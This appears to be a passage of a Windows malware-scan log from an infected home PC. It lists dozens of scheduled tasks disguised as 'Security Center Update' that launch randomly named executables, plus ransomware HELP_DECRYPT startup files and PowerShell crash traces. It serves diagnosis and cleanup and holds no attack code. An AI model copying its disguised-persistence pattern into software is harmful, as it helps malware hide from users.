Task: {0C23B36F-F62C-434F-AA02-5ADBADF1858B} - System32\Tasks\Security Center Update - 2231539794 => C:\Users\Dorothy01\AppData\Roaming\Qaedxa\uwywweo.exe <==== ATTENTION
Task: {10DBF29F-9C03-4CB6-9169-375E42E32964} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\WSCStub.exe [2014-12-06] (Symantec Corporation)
Task: {11313470-E7D3-43C8-A7F7-5F76D072D93D} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {14653784-6568-4765-B81E-19CEB2C29EEF} - System32\Tasks\Security Center Update - 304447838 => C:\Users\Dorothy01\AppData\Roaming\Fyarxy\odrakal.exe <==== ATTENTION
Task: {14B872C9-ED54-4ACC-A2E9-1A45CAD02CCE} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {1DE689D1-D5D6-4E99-9906-A33502FF48FF} - System32\Tasks\Security Center Update - 3156874879 => C:\Users\Dorothy01\AppData\Roaming\Ziqeexew\peisomr.exe <==== ATTENTION
Task: {29FD53A0-B0E0-4AC5-A535-A77BDBAB7300} - System32\Tasks\Security Center Update - 1511213846 => C:\Users\Dorothy01\AppData\Roaming\Ynopqual\epeht.exe <==== ATTENTION
Task: {348D35BE-0530-4438-9C00-FA4E457087F1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-19] (Google Inc.)
Task: {34D40EAE-6659-4B8C-8F0E-5D9D8F76EE87} - System32\Tasks\Security Center Update - 3665910781 => C:\Users\Dorothy01\AppData\Roaming\Ekmiys\edanuzh.exe <==== ATTENTION
Task: {38AD3EE9-89B1-4FE8-BD3A-C268041E30AB} - System32\Tasks\Security Center Update - 3379427597 => C:\Users\Dorothy01\AppData\Roaming\Obmukany\otipky.exe <==== ATTENTION
Task: {45D84C00-2A3B-4698-945A-BD5F046DE8C1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-08-15] (Hewlett-Packard Company)
Task: {46591690-E2C7-4AB5-90B8-0807BF83FA2E} - System32\Tasks\Security Center Update - 1219234967 => C:\Users\Dorothy01\AppData\Roaming\Hovoote\viywyke.exe <==== ATTENTION
Task: {4FE7F4B5-6216-4BF5-B69B-AE6DCAB85ACC} - System32\Tasks\Security Center Update - 951185298 => C:\Users\Dorothy01\AppData\Roaming\Tumiexcu\esinwii.exe <==== ATTENTION
Task: {506490F7-3376-4EFC-A901-586AA3303B44} - System32\Tasks\Security Center Update - 2325803103 => C:\Users\Dorothy01\AppData\Roaming\Adhoxi\vywipir.exe <==== ATTENTION
Task: {516E887F-D9AA-43E6-A51E-2905BC435DC3} - System32\Tasks\Security Center Update - 1528112639 => C:\Users\Dorothy01\AppData\Roaming\Kuseyd\ihnoxa.exe <==== ATTENTION
Task: {58DBAADD-4BFC-48F9-A19E-02A3DBE8DB7A} - System32\Tasks\Security Center Update - 2901739987 => C:\Users\Dorothy01\AppData\Roaming\Icxeewhu\avazx.exe <==== ATTENTION
Task: {62015E40-868F-450C-BB00-4F2987356F87} - System32\Tasks\Security Center Update - 3903236305 => C:\Users\Dorothy01\AppData\Roaming\Itufefv\qusieny.exe <==== ATTENTION
Task: {636CB7B6-8835-4A64-A923-ED55EB0D8640} - System32\Tasks\Security Center Update - 2512843633 => C:\Users\Dorothy01\AppData\Roaming\Ohvyev\yketpyu.exe <==== ATTENTION
Task: {6378A9C8-1406-4725-9242-44BFD048B5CE} - System32\Tasks\Security Center Update - 331106455 => C:\Users\Dorothy01\AppData\Roaming\Ymqiuky\mipiims.exe <==== ATTENTION
Task: {639A2A23-A522-40F7-AD5D-9F1245DF1A82} - System32\Tasks\Security Center Update - 2487970780 => C:\Users\Dorothy01\AppData\Roaming\Pevyliu\adelre.exe <==== ATTENTION
Task: {6BB0DD4F-FC46-49AF-B590-4F9F44C7E1A7} - System32\Tasks\rspahma => C:\Users\DOROTH~1\AppData\Local\Temp\utyczdi.exe <==== ATTENTION
Task: {70C6EC5A-CD9A-41DE-8073-EBF9E70D4E54} - System32\Tasks\Security Center Update - 3838766864 => C:\Users\Dorothy01\AppData\Roaming\Ezrydu\xyelefq.exe <==== ATTENTION
Task: {72165FBF-954D-4040-B5B5-BC5F9EED3A0E} - System32\Tasks\Security Center Update - 3216473386 => C:\Users\Dorothy01\AppData\Roaming\Zacosia\geulby.exe <==== ATTENTION
Task: {7430F638-B12A-445A-BBEF-5E8F514DF753} - System32\Tasks\Security Center Update - 699896687 => C:\Users\Dorothy01\AppData\Roaming\Itsefo\zyyzpii.exe <==== ATTENTION
Task: {7444E2A1-12CB-40A5-B56A-3E21543B4514} - System32\Tasks\Security Center Update - 3204526539 => C:\Users\Dorothy01\AppData\Roaming\Huqokayx\cazol.exe <==== ATTENTION
Task: {797B7B84-6E57-4129-A6A9-7A7099782A48} - System32\Tasks\Security Center Update - 242654636 => C:\Users\Dorothy01\AppData\Roaming\Maypyz\acoxv.exe <==== ATTENTION
Task: {7BB4C936-AFE9-405B-8288-876487348757} - System32\Tasks\Security Center Update - 116467704 => C:\Users\Dorothy01\AppData\Roaming\Zekubuab\usloe.exe <==== ATTENTION
Task: {7E32FCE3-C859-49A2-8E75-598B56230006} - System32\Tasks\Security Center Update - 4028262528 => C:\Users\Dorothy01\AppData\Roaming\Byloaq\uzodzay.exe <==== ATTENTION
Task: {833517E7-60C9-4EBA-B5E2-E1A24D86CE1A} - System32\Tasks\Security Center Update - 2519066445 => C:\Users\Dorothy01\AppData\Roaming\Ruyxku\vyfyr.exe <==== ATTENTION
Task: {86BAB3C1-BEB4-4F5B-9723-D319FC15EB44} - System32\Tasks\Security Center Update - 1810362612 => C:\Users\Dorothy01\AppData\Roaming\Senyzayr\ynval.exe <==== ATTENTION
Task: {86C013A6-B536-4DF0-BEDC-656D87A1D6D5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2012-08-07] (Hewlett-Packard Company)
Task: {8A4EFB2F-EFF1-4B4C-A1E0-641064B8C832} - System32\Tasks\Security Center Update - 3747167081 => C:\Users\Dorothy01\AppData\Roaming\Kybeuv\zywefu.exe <==== ATTENTION
Task: {91474FF9-C8FF-4F7E-B671-C5BAA856571C} - System32\Tasks\Security Center Update - 513270047 => C:\Users\Dorothy01\AppData\Roaming\Veepme\mearabi.exe <==== ATTENTION
Task: {9A50C6A9-6D3C-4A7F-B237-D2E34D535BAF} - System32\Tasks\Security Center Update - 4149247359 => C:\Users\Dorothy01\AppData\Roaming\Tapyara\ehubzy.exe <==== ATTENTION
Task: {9BD8C08F-7F0B-430E-AD7D-12988F4D4D76} - System32\Tasks\Security Center Update - 1179286971 => C:\Users\Dorothy01\AppData\Roaming\Ciokov\ekypu.exe <==== ATTENTION
Task: {9CD254AC-60CC-41FE-B8C7-884BAC0FA4A3} - System32\Tasks\Security Center Update - 1285267939 => C:\Users\Dorothy01\AppData\Roaming\Ytbynede\ebusfe.exe <==== ATTENTION
Task: {9DB27102-BD01-4DBA-AA72-192BAC09BFE7} - System32\Tasks\Security Center Update - 3201999599 => C:\Users\Dorothy01\AppData\Roaming\Ihywkead\olypozo.exe <==== ATTENTION
Task: {A24B621A-54AB-4FAF-9C35-FB0D87321DD4} - System32\Tasks\Security Center Update - 1259602875 => C:\Users\Dorothy01\AppData\Roaming\Egewtoi\kumysio.exe <==== ATTENTION
Task: {A31D10D4-B4CF-4475-B02B-0A9BEB4E6617} - System32\Tasks\Security Center Update - 2329648882 => C:\Users\Dorothy01\AppData\Roaming\Ecqootfi\inecimy.exe <==== ATTENTION
Task: {A3FB09EC-C469-45ED-8A04-7E9497A4358B} - System32\Tasks\Security Center Update - 532629427 => C:\Users\Dorothy01\AppData\Roaming\Mawywopo\yhrog.exe <==== ATTENTION
Task: {A589DDED-A1E5-4832-A451-604AADF76C94} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {ACE571AA-4750-4BA4-9AB7-285B651F13E4} - System32\Tasks\Security Center Update - 578871115 => C:\Users\Dorothy01\AppData\Roaming\Wiudiz\areta.exe <==== ATTENTION
Task: {B1AE1850-9814-4733-A837-1BCFDCA93C2F} - System32\Tasks\Security Center Update - 1433702555 => C:\Users\Dorothy01\AppData\Roaming\Olaqduqo\oxico.exe <==== ATTENTION
Task: {B2111A5C-17C6-42AC-8232-C4BFBD5CEAE2} - System32\Tasks\Security Center Update - 2786531556 => C:\Users\Dorothy01\AppData\Roaming\Guhyanmo\usukrau.exe <==== ATTENTION
Task: {B31AB263-6E64-4AE6-9131-F03F3EB11C96} - System32\Tasks\Security Center Update - 2649167008 => C:\Users\Dorothy01\AppData\Roaming\Amcyocut\seovado.exe <==== ATTENTION
Task: {B69D26CC-F736-43EF-8678-4047B1182B5E} - System32\Tasks\Security Center Update - 4109173847 => C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf\ziexepo.exe <==== ATTENTION
Task: {BA2069FF-78E4-45BC-B55E-CD0ACD43F066} - System32\Tasks\Security Center Update - 2002689914 => C:\Users\Dorothy01\AppData\Roaming\Hyipfy\eheqqu.exe <==== ATTENTION
Task: {BB68D13D-D1D6-492F-8D8C-218D8F32F366} - System32\Tasks\Security Center Update - 3566967998 => C:\Users\Dorothy01\AppData\Roaming\Sequefb\apxuyb.exe <==== ATTENTION
Task: {C0214B00-381D-48C6-8657-2096534B77ED} - System32\Tasks\Security Center Update - 2047020247 => C:\Users\Dorothy01\AppData\Roaming\Woakduwa\vyvefiy.exe <==== ATTENTION
Task: {C8F0BD03-484C-4EA4-B730-E73FCF57C579} - System32\Tasks\Security Center Update - 1058146964 => C:\Users\Dorothy01\AppData\Roaming\Esisgyl\hupoto.exe <==== ATTENTION
Task: {CCE07978-A743-41CE-84CE-1E73B09468DB} - System32\Tasks\Security Center Update - 4056442320 => C:\Users\Dorothy01\AppData\Roaming\Ucucni\qyhyg.exe <==== ATTENTION
Task: {D042FFB9-18A6-451E-A0B3-D8F8FDB41F2E} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {D272D6E1-FF48-4D29-8FED-3859A8299DC8} - System32\Tasks\Security Center Update - 446489216 => C:\Users\Dorothy01\AppData\Roaming\Gynika\daboop.exe <==== ATTENTION
Task: {D7DFAC78-DC9A-420F-9905-9654F37432EC} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-19] (Google Inc.)
Task: {D8A8741F-AFA1-45BC-8531-65E4136E8CD5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-08-15] (Hewlett-Packard Company)
Task: {DAF472B5-87C9-4EB7-BD1F-23897D28E7CF} - System32\Tasks\Security Center Update - 4131681425 => C:\Users\Dorothy01\AppData\Roaming\Upvukyy\qikoiqp.exe <==== ATTENTION
Task: {DD416C59-DA11-4673-95DF-6CCB71853F43} - System32\Tasks\Security Center Update - 2300971329 => C:\Users\Dorothy01\AppData\Roaming\Fuwutee\kikiap.exe <==== ATTENTION
Task: {F0BDD635-04A8-43FD-B541-D9182F90415D} - System32\Tasks\Security Center Update - 4105554909 => C:\Users\Dorothy01\AppData\Roaming\Wuwuec\xeabac.exe <==== ATTENTION
Task: {F70673BE-9DA6-4FE7-93FB-32DE754FBB81} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\windows\system32\MRT.exe [2014-09-12] (Microsoft Corporation)
Task: {F9426B1C-C5B8-43C1-9B81-F5F6932587E9} - System32\Tasks\Security Center Update - 700698430 => C:\Users\Dorothy01\AppData\Roaming\Edutsoix\idyzsya.exe <==== ATTENTION
Task: {FA7D302B-25B4-4938-976B-AFD59ED105BC} - System32\Tasks\Security Center Update - 3992158093 => C:\Users\Dorothy01\AppData\Roaming\Onpyym\puzyril.exe <==== ATTENTION
Task: {FDF8C72F-4705-4C83-B0F3-47690D02FCBE} - System32\Tasks\Security Center Update - 4183678770 => C:\Users\Dorothy01\AppData\Roaming\Rifiewyn\puyrdo.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\avast! Emergency Update.job => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) ==============
 
2014-07-04 22:33 - 2014-07-04 22:33 - 00127488 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2012-07-19 19:06 - 2012-07-19 19:06 - 00120224 _____ () c:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPItunesModule.dll
2012-07-19 19:06 - 2012-07-19 19:06 - 00048544 _____ () c:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPItunesProxy.dll
2012-07-19 19:07 - 2012-07-19 19:07 - 00180224 _____ () c:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\zxing.dll
2014-10-14 13:10 - 2014-10-14 13:10 - 00120224 _____ () C:\Users\Dorothy01\AppData\Local\assembly\dl3\N1ZEJ5WT.E21\Y8VKR1P8.4QP\edb32bf5\0038bcf4_1366cd01\HPItunesModule.DLL
2014-07-04 22:33 - 2014-07-04 22:33 - 00102400 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2012-05-04 17:42 - 2012-05-04 17:42 - 00098304 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\BrandingNet4.dll
2015-02-19 21:17 - 2015-02-19 21:17 - 02911744 _____ () C:\Program Files\AVAST Software\Avast\defs\15021901\algo.dll
2014-07-31 13:16 - 2014-07-31 13:16 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 13:16 - 2014-07-31 13:16 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-12-09 18:31 - 2012-05-30 00:51 - 00699280 ____R () C:\PROGRAM FILES (X86)\NORTON INTERNET SECURITY\ENGINE\20.6.0.27\wincfi39.dll
2015-02-19 21:17 - 2015-02-19 21:17 - 38562088 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
 
==================== EXE Association (whitelisted) ===============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\HP\HP_Svinoya_Norway_Sunset.jpg
DNS Servers: Media is not connected to internet.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run32: => "{30112b75-e574-a6db-560c-8103291a0838}"
HKLM\...\StartupApproved\Run32: => "CrashReportSaver"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\StartupFolder: => "HELP_DECRYPT.URL"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\StartupFolder: => "HELP_DECRYPT.TXT"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\StartupFolder: => "HELP_DECRYPT.PNG"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\StartupFolder: => "HELP_DECRYPT.HTML"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\Run: => "acikmao"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\Run: => "BluetoothS"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\Run: => "dccwmote"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\Run: => "Driver Support"
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1427692388-1042374531-2795145444-500 - Administrator - Disabled)
Dorothy01 (S-1-5-21-1427692388-1042374531-2795145444-1001 - Administrator - Enabled) => C:\Users\Dorothy01
Guest (S-1-5-21-1427692388-1042374531-2795145444-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1427692388-1042374531-2795145444-1006 - Limited - Enabled)
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (02/21/2015 10:40:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.3.9600.16384, time stamp: 0x52158733
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x033c92b8
Faulting process id: 0x13f4
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (02/21/2015 10:40:48 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:40:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.3.9600.16384, time stamp: 0x52158733
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x033878b0
Faulting process id: 0xf0c
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (02/21/2015 10:40:35 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
